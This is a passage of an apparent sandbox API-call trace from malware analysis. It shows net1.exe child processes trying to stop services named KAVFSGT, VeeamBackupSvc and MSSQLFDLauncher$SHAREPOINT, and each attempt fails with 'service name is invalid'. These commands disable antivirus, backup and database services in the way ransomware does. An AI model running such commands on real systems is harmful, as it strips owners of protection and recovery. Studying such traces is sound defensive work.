(_String1="rdr", _String2="KAVFSGT") returned 7 [0120.887] _wcsicmp (_String1="workstation", _String2="KAVFSGT") returned 12 [0120.887] _wcsicmp (_String1="work", _String2="KAVFSGT") returned 12 [0120.887] _wcsicmp (_String1="wksta", _String2="KAVFSGT") returned 12 [0120.887] _wcsicmp (_String1="prdr", _String2="KAVFSGT") returned 5 [0120.887] _wcsicmp (_String1="devrdr", _String2="KAVFSGT") returned -7 [0120.887] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFSGT") returned 1 [0120.887] _wcsicmp (_String1="server", _String2="KAVFSGT") returned 8 [0120.887] _wcsicmp (_String1="svr", _String2="KAVFSGT") returned 8 [0120.887] _wcsicmp (_String1="srv", _String2="KAVFSGT") returned 8 [0120.887] _wcsicmp (_String1="lanmanserver", _String2="KAVFSGT") returned 1 [0120.887] _wcsicmp (_String1="alerter", _String2="KAVFSGT") returned -10 [0120.887] _wcsicmp (_String1="netlogon", _String2="KAVFSGT") returned 3 [0120.887] NetServiceControl (in: servername=0x0, service="KAVFSGT", opcode=0x0, arg=0x0, bufptr=0xef8dc | out: bufptr=0xef8dc) returned 0x889 [0120.888] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.888] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.889] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.890] GetFileType (hFile=0x0) returned 0x0 [0120.890] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6e3eb8 [0120.890] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6e3eb8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0120.890] WriteFile (in: hFile=0x0, lpBuffer=0x6e3eb8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xef81c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef81c, lpOverlapped=0x0) returned 0 [0120.890] LocalFree (hMem=0x6e3eb8) returned 0x0 [0120.890] GetFileType (hFile=0x0) returned 0x0 [0120.890] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6e6160 [0120.891] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6e6160, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nn", lpUsedDefaultChar=0x0) returned 2 [0120.891] WriteFile (in: hFile=0x0, lpBuffer=0x6e6160, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xef81c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef81c, lpOverlapped=0x0) returned 0 [0120.891] LocalFree (hMem=0x6e6160) returned 0x0 [0120.891] _ultow (in: _Dest=0x889, _Radix=981068 | out: _Dest=0x889) returned="2185" [0120.891] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.891] GetFileType (hFile=0x0) returned 0x0 [0120.891] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6e6160 [0120.891] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6e6160, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.891] WriteFile (in: hFile=0x0, lpBuffer=0x6e6160, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xef828, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef828, lpOverlapped=0x0) returned 0 [0120.891] LocalFree (hMem=0x6e6160) returned 0x0 [0120.891] GetFileType (hFile=0x0) returned 0x0 [0120.891] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6e6160 [0120.891] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6e6160, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nn", lpUsedDefaultChar=0x0) returned 2 [0120.891] WriteFile (in: hFile=0x0, lpBuffer=0x6e6160, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xef828, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xef828, lpOverlapped=0x0) returned 0 [0120.891] LocalFree (hMem=0x6e6160) returned 0x0 [0120.892] NetApiBufferFree (Buffer=0x6e1ad8) returned 0x0 [0120.892] NetApiBufferFree (Buffer=0x6e1af0) returned 0x0 [0120.892] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop KAVFSGT /y" [0120.892] exit (_Code=2) Process: id = "246" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5d71a000" os_pid = "0xc8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "118" os_parent_pid = "0x2a8" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamBackupSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 640 os_tid = 0x418 [0120.419] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fb1c | out: lpSystemTimeAsFileTime=0x16fb1c*(dwLowDateTime=0x1b841b50, dwHighDateTime=0x1d6f0d1)) [0120.419] GetCurrentProcessId () returned 0xc8c [0120.419] GetCurrentThreadId () returned 0x418 [0120.419] GetTickCount () returned 0x1151611 [0120.419] QueryPerformanceCounter (in: lpPerformanceCount=0x16fb14 | out: lpPerformanceCount=0x16fb14*=23952026240) returned 1 [0120.420] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0120.420] __set_app_type (_Type=0x1) [0120.420] __p__fmode () returned 0x770331f4 [0120.420] __p__commode () returned 0x770331fc [0120.420] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0120.420] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0120.420] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.420] GetConsoleOutputCP () returned 0x1b5 [0120.421] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0120.421] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.424] sprintf_s (in: _DstBuf=0x16fad4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.424] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.426] GetStdHandle (nStdHandle=0xfffffff5) returned 0x470 [0120.426] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.426] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamBackupSvc /y" [0120.426] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f8a0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.426] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x0, Size=0x70) returned 0x7c3ae0 [0120.426] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.426] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16faa4 | out: Buffer=0x16faa4*=0x7c1ae8) returned 0x0 [0120.426] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16faa4 | out: Buffer=0x16faa4*=0x7c1b00) returned 0x0 [0120.426] _fileno (_File=0x77032900) returned -2 [0120.426] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.426] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.427] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.427] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.427] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.427] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.427] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.427] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.427] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.427] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.427] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.427] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.427] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.427] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.427] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.427] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.427] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.427] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.427] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.427] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.427] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.427] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.427] _wcsicmp (_String1="accounts", _String2="VeeamBackupSvc") returned -21 [0120.427] _wcsicmp (_String1="computer", _String2="VeeamBackupSvc") returned -19 [0120.427] _wcsicmp (_String1="config", _String2="VeeamBackupSvc") returned -19 [0120.427] _wcsicmp (_String1="continue", _String2="VeeamBackupSvc") returned -19 [0120.427] _wcsicmp (_String1="cont", _String2="VeeamBackupSvc") returned -19 [0120.427] _wcsicmp (_String1="file", _String2="VeeamBackupSvc") returned -16 [0120.427] _wcsicmp (_String1="files", _String2="VeeamBackupSvc") returned -16 [0120.427] _wcsicmp (_String1="group", _String2="VeeamBackupSvc") returned -15 [0120.427] _wcsicmp (_String1="groups", _String2="VeeamBackupSvc") returned -15 [0120.427] _wcsicmp (_String1="help", _String2="VeeamBackupSvc") returned -14 [0120.427] _wcsicmp (_String1="helpmsg", _String2="VeeamBackupSvc") returned -14 [0120.427] _wcsicmp (_String1="localgroup", _String2="VeeamBackupSvc") returned -10 [0120.427] _wcsicmp (_String1="pause", _String2="VeeamBackupSvc") returned -6 [0120.427] _wcsicmp (_String1="session", _String2="VeeamBackupSvc") returned -3 [0120.427] _wcsicmp (_String1="sessions", _String2="VeeamBackupSvc") returned -3 [0120.427] _wcsicmp (_String1="sess", _String2="VeeamBackupSvc") returned -3 [0120.427] _wcsicmp (_String1="share", _String2="VeeamBackupSvc") returned -3 [0120.428] _wcsicmp (_String1="start", _String2="VeeamBackupSvc") returned -3 [0120.428] _wcsicmp (_String1="stats", _String2="VeeamBackupSvc") returned -3 [0120.428] _wcsicmp (_String1="statistics", _String2="VeeamBackupSvc") returned -3 [0120.428] _wcsicmp (_String1="stop", _String2="VeeamBackupSvc") returned -3 [0120.428] _wcsicmp (_String1="time", _String2="VeeamBackupSvc") returned -2 [0120.428] _wcsicmp (_String1="user", _String2="VeeamBackupSvc") returned -1 [0120.428] _wcsicmp (_String1="users", _String2="VeeamBackupSvc") returned -1 [0120.428] _wcsicmp (_String1="msg", _String2="VeeamBackupSvc") returned -9 [0120.428] _wcsicmp (_String1="messenger", _String2="VeeamBackupSvc") returned -9 [0120.428] _wcsicmp (_String1="receiver", _String2="VeeamBackupSvc") returned -4 [0120.428] _wcsicmp (_String1="rcv", _String2="VeeamBackupSvc") returned -4 [0120.428] _wcsicmp (_String1="netpopup", _String2="VeeamBackupSvc") returned -8 [0120.428] _wcsicmp (_String1="redirector", _String2="VeeamBackupSvc") returned -4 [0120.428] _wcsicmp (_String1="redir", _String2="VeeamBackupSvc") returned -4 [0120.428] _wcsicmp (_String1="rdr", _String2="VeeamBackupSvc") returned -4 [0120.428] _wcsicmp (_String1="workstation", _String2="VeeamBackupSvc") returned 1 [0120.428] _wcsicmp (_String1="work", _String2="VeeamBackupSvc") returned 1 [0120.428] _wcsicmp (_String1="wksta", _String2="VeeamBackupSvc") returned 1 [0120.428] _wcsicmp (_String1="prdr", _String2="VeeamBackupSvc") returned -6 [0120.428] _wcsicmp (_String1="devrdr", _String2="VeeamBackupSvc") returned -18 [0120.428] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamBackupSvc") returned -10 [0120.428] _wcsicmp (_String1="server", _String2="VeeamBackupSvc") returned -3 [0120.428] _wcsicmp (_String1="svr", _String2="VeeamBackupSvc") returned -3 [0120.428] _wcsicmp (_String1="srv", _String2="VeeamBackupSvc") returned -3 [0120.428] _wcsicmp (_String1="lanmanserver", _String2="VeeamBackupSvc") returned -10 [0120.428] _wcsicmp (_String1="alerter", _String2="VeeamBackupSvc") returned -21 [0120.428] _wcsicmp (_String1="netlogon", _String2="VeeamBackupSvc") returned -8 [0120.428] _wcsupr (in: _String="VeeamBackupSvc" | out: _String="VEEAMBACKUPSVC") returned="VEEAMBACKUPSVC" [0120.428] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7c54b0 [0120.896] GetServiceKeyNameW (in: hSCManager=0x7c54b0, lpDisplayName="VEEAMBACKUPSVC", lpServiceName=0x39aaf0, lpcchBuffer=0x16fa40 | out: lpServiceName="", lpcchBuffer=0x16fa40) returned 0 [0120.897] _wcsicmp (_String1="msg", _String2="VEEAMBACKUPSVC") returned -9 [0120.897] _wcsicmp (_String1="messenger", _String2="VEEAMBACKUPSVC") returned -9 [0120.897] _wcsicmp (_String1="receiver", _String2="VEEAMBACKUPSVC") returned -4 [0120.897] _wcsicmp (_String1="rcv", _String2="VEEAMBACKUPSVC") returned -4 [0120.897] _wcsicmp (_String1="redirector", _String2="VEEAMBACKUPSVC") returned -4 [0120.897] _wcsicmp (_String1="redir", _String2="VEEAMBACKUPSVC") returned -4 [0120.897] _wcsicmp (_String1="rdr", _String2="VEEAMBACKUPSVC") returned -4 [0120.897] _wcsicmp (_String1="workstation", _String2="VEEAMBACKUPSVC") returned 1 [0120.897] _wcsicmp (_String1="work", _String2="VEEAMBACKUPSVC") returned 1 [0120.897] _wcsicmp (_String1="wksta", _String2="VEEAMBACKUPSVC") returned 1 [0120.897] _wcsicmp (_String1="prdr", _String2="VEEAMBACKUPSVC") returned -6 [0120.897] _wcsicmp (_String1="devrdr", _String2="VEEAMBACKUPSVC") returned -18 [0120.897] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMBACKUPSVC") returned -10 [0120.897] _wcsicmp (_String1="server", _String2="VEEAMBACKUPSVC") returned -3 [0120.897] _wcsicmp (_String1="svr", _String2="VEEAMBACKUPSVC") returned -3 [0120.897] _wcsicmp (_String1="srv", _String2="VEEAMBACKUPSVC") returned -3 [0120.897] _wcsicmp (_String1="lanmanserver", _String2="VEEAMBACKUPSVC") returned -10 [0120.897] _wcsicmp (_String1="alerter", _String2="VEEAMBACKUPSVC") returned -21 [0120.897] _wcsicmp (_String1="netlogon", _String2="VEEAMBACKUPSVC") returned -8 [0120.897] NetServiceControl (in: servername=0x0, service="VEEAMBACKUPSVC", opcode=0x0, arg=0x0, bufptr=0x16fa3c | out: bufptr=0x16fa3c) returned 0x889 [0120.899] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.899] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.899] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.900] GetFileType (hFile=0x0) returned 0x0 [0120.900] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x7c3ed0 [0120.900] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x7c3ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0120.901] WriteFile (in: hFile=0x0, lpBuffer=0x7c3ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x16f97c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f97c, lpOverlapped=0x0) returned 0 [0120.901] LocalFree (hMem=0x7c3ed0) returned 0x0 [0120.901] GetFileType (hFile=0x0) returned 0x0 [0120.901] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7c6178 [0120.901] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7c6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n|", lpUsedDefaultChar=0x0) returned 2 [0120.901] WriteFile (in: hFile=0x0, lpBuffer=0x7c6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f97c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f97c, lpOverlapped=0x0) returned 0 [0120.901] LocalFree (hMem=0x7c6178) returned 0x0 [0120.901] _ultow (in: _Dest=0x889, _Radix=1505708 | out: _Dest=0x889) returned="2185" [0120.901] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.901] GetFileType (hFile=0x0) returned 0x0 [0120.901] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7c6178 [0120.901] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7c6178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.901] WriteFile (in: hFile=0x0, lpBuffer=0x7c6178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x16f988, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f988, lpOverlapped=0x0) returned 0 [0120.901] LocalFree (hMem=0x7c6178) returned 0x0 [0120.901] GetFileType (hFile=0x0) returned 0x0 [0120.901] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7c6178 [0120.901] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7c6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n|", lpUsedDefaultChar=0x0) returned 2 [0120.901] WriteFile (in: hFile=0x0, lpBuffer=0x7c6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f988, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f988, lpOverlapped=0x0) returned 0 [0120.901] LocalFree (hMem=0x7c6178) returned 0x0 [0120.902] NetApiBufferFree (Buffer=0x7c1ae8) returned 0x0 [0120.902] NetApiBufferFree (Buffer=0x7c1b00) returned 0x0 [0120.902] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamBackupSvc /y" [0120.902] exit (_Code=2) Process: id = "247" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5990e000" os_pid = "0xcc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "119" os_parent_pid = "0xc64" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 641 os_tid = 0xdd4 [0120.451] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ff99c | out: lpSystemTimeAsFileTime=0x2ff99c*(dwLowDateTime=0x1b88de10, dwHighDateTime=0x1d6f0d1)) [0120.451] GetCurrentProcessId () returned 0xcc0 [0120.451] GetCurrentThreadId () returned 0xdd4 [0120.451] GetTickCount () returned 0x1151630 [0120.451] QueryPerformanceCounter (in: lpPerformanceCount=0x2ff994 | out: lpPerformanceCount=0x2ff994*=23955208266) returned 1 [0120.451] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0120.451] __set_app_type (_Type=0x1) [0120.451] __p__fmode () returned 0x770331f4 [0120.452] __p__commode () returned 0x770331fc [0120.452] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0120.452] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0120.452] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.452] GetConsoleOutputCP () returned 0x1b5 [0120.453] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0120.453] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.456] sprintf_s (in: _DstBuf=0x2ff954, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.457] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.459] GetStdHandle (nStdHandle=0xfffffff5) returned 0x470 [0120.459] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.459] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SHAREPOINT /y" [0120.459] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ff720, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.459] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x88) returned 0x4a4ad8 [0120.459] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.459] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ff924 | out: Buffer=0x2ff924*=0x4a1b10) returned 0x0 [0120.460] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ff924 | out: Buffer=0x2ff924*=0x4a1b28) returned 0x0 [0120.460] _fileno (_File=0x77032900) returned -2 [0120.460] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.460] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.460] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.460] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.460] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.460] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.460] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.460] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.460] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.460] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.460] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.460] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.460] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.460] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.460] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.460] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.460] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.460] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.460] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.460] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.460] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.460] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.460] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$SHAREPOINT") returned -12 [0120.461] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$SHAREPOINT") returned -10 [0120.461] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$SHAREPOINT") returned -10 [0120.461] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$SHAREPOINT") returned -10 [0120.461] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$SHAREPOINT") returned -10 [0120.461] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$SHAREPOINT") returned -7 [0120.461] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$SHAREPOINT") returned -7 [0120.461] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$SHAREPOINT") returned -6 [0120.461] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$SHAREPOINT") returned -6 [0120.461] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$SHAREPOINT") returned -5 [0120.461] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$SHAREPOINT") returned -5 [0120.461] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$SHAREPOINT") returned -1 [0120.461] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$SHAREPOINT") returned 3 [0120.461] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0120.461] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0120.461] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0120.461] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0120.461] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0120.461] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0120.461] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0120.461] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0120.461] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$SHAREPOINT") returned 7 [0120.461] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$SHAREPOINT") returned 8 [0120.461] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$SHAREPOINT") returned 8 [0120.461] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$SHAREPOINT") returned -12 [0120.461] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$SHAREPOINT") returned -14 [0120.461] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0120.461] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0120.461] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$SHAREPOINT") returned 1 [0120.461] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0120.461] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0120.461] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0120.461] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$SHAREPOINT") returned 10 [0120.461] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$SHAREPOINT") returned 10 [0120.461] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$SHAREPOINT") returned 10 [0120.461] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$SHAREPOINT") returned 3 [0120.461] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$SHAREPOINT") returned -9 [0120.462] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$SHAREPOINT") returned -1 [0120.462] _wcsicmp (_String1="server", 